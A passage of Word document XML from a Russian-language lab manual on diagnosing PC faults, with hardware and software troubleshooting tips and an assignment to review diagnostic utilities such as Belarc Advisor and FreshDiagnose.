          <w:numId w:val="8"/>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Протестируйте жесткий диск на наличие битых секторов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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Современные программы состоят из множества файлов, причем совсем необязательно все они сразу же загружаются в ОЗУ. Следовательно, если той или иной функцией вы пользуетесь достаточно редко, проблема может проявить себя не сразу. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Лучшие утилиты для проверки работоспособности современных накопителей – Vicrotia, HDDScan, MHDD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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Обновите драйвера для важнейших аппаратных компонентов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>После этого обязательно перегрузите компьютер и проверьте систему на наличие ошибок</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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На время удалите недавно установленные программы</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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Теоретически на компьютер можно инсталлировать любое совместимое ПО, но на практике часто случается, что одни программы начинают конфликтовать с другими. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Этим славится, в частности, антивирус Касперского, некоторые системные утилиты и старые игры</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Если после этого сбои прекратились, проверьте наличие программной заплатки (патча) от производителя или поищите решение на официальном форуме.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выявление неисправностей на аппаратном уровне</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Проведите генеральную уборку системного блока</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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Хлопья пыли, заполонившие компьютер, напрямую сказываются на температурном режиме работы его компонентов и могут провоцировать самые разнообразные проблемы, начиная с банального падения скорости работы и заканчивая внезапным отключением процессора из-за перегрева. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вам потребуется хороший пылесос (желательно, способный работать на выдув) и несколько часов свободного времени</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="360" w:right="360" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отключение периферийного оборудования</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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Конфликты с системой могут провоцировать и разнообразные платы расширения или некорректные драйвера для них. Главные подозреваемые – внешние звуковые и сетевые карты, платы видеозахвата и внутренние модемы. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В самых тяжелых случаях виновником может оказаться жесткий диск и планка памяти, но это, скорее, исключение из правил</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Также подобный казус случается в том случае, если старую плату расширения пытаются </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>подружить</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> с новейшей ОС. Для подтверждения неисправности проверьте работу </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>облегченного</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ПК несколькими диагностическими утилитами.</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b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Еще одна возможность обнаружить неисправность – удаление </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>лишних</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> компонентов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Отключите все устройства кроме процессора, системного жесткого диска и одной планки памяти. Если проблема исчезла, по очереди добавляйте устройства, пока </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>виновник</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> не будет найден.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="360" w:right="360" w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Убедитесь в достаточной мощности блока питания</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сильными отклонениями от заявленных параметров славятся многие </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>китайские</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> БП, когда фактическая и реально выдаваемая мощность может отличаться процентов на 30-40</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. При работе в щадящем режиме это никак не сказывается, но при запуске любой ресурсоемкой игры или фотошопа компьютер из-за просевшего питания может начать чудить. Лечение, увы, связано с дополнительными расходами, так как придется покупать новый блок питания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если все вышеперечисленное не принесло желаемых результатов, придется тщательно протестировать каждый компонент ПК. В домашних условиях подобный подвиг вряд ли осуществим, потому похода в сервисный центр избежать не удастся. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Можно, конечно, попробовать переустановить ОС с нуля, но если проблема кроется в аппаратных компонентах, это окажется лишней тратой времени.</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b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </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xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="000717C8" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Провести диагностику системы </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>средствами Everest, CPU-Z, Sandra, Belarc Advisor, FreshDiagnose.</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2. Составьте отчет со скриншотами, в котором опишите особенности утилит (ваше мнение).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Краткий обзор программ для диагностики системы</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b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1. Belarc Advisor.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1548"/>
        <w:gridCol w:w="560"/>
        <w:gridCol w:w="2387"/>
        <w:gridCol w:w="670"/>
        <w:gridCol w:w="876"/>
        <w:gridCol w:w="3813"/>
      </w:tblGrid>
      <w:tr w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidTr="000717C8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>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Производитель</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Тип</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2384" w:type="dxa"/>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 xml:space="preserve">ОС </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 xml:space="preserve">Язык </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>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Размер, Мбайт</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Домашняя страница</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidTr="000717C8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>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Belarc</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fw</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2384" w:type="dxa"/>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 xml:space="preserve">Windows </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>95/98/Me/NT4/2000/XP/7</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англ</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="861" w:type="dxa"/>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val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>0,845</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val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>http</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>://</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>www</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>belarc</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>com</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>free</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>download</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Среди большого количества программ, анализирующих аппаратные компоненты и программную среду компьютера, выделяются две, отличительными чертами которых являются простота в использовании и эффективность. Одна из этих утилит называется Belarc Advisor. Эта нетребовательная к системным ресурсам программа позволяет за считанные секунды просканировать систему. На основе полученных данных Belarc Advisor генерирует HTML-файл, в котором представлены сведения обо всех компонентах компьютера: материнской плате, процессоре, модулях оперативной памяти, платах расширений, видеокарте, винчестере, приводах компакт-дисков и DVD и т.д. При этом программа указывает полный объем имеющегося на момент сканирования системы свободного места на дисках. С помощью Belarc Advisor вы сможете узнать о своем компьютере практически все!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="00980B64">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>2. FreshDiagnose</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1762"/>
        <w:gridCol w:w="616"/>
        <w:gridCol w:w="2737"/>
        <w:gridCol w:w="744"/>
        <w:gridCol w:w="982"/>
        <w:gridCol w:w="3013"/>
      </w:tblGrid>
      <w:tr w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidTr="000C00A6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>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Производитель</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Тип</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2574" w:type="dxa"/>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 xml:space="preserve">ОС </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 xml:space="preserve">Язык </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Размер, Мбайт</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Домашняя страница</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidTr="000C00A6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>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freshdevices</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fw</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2574" w:type="dxa"/>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 xml:space="preserve">Windows </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>95/98/Me/NT4/2000/XP/7</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eastAsia="en-US"/>
              </w:rPr>
              <w:t>англ</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>.</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val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>1,23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00980B64" w:rsidRPr="00617AC0" w:rsidRDefault="00980B64" w:rsidP="000717C8">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>http</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>://</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>www</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
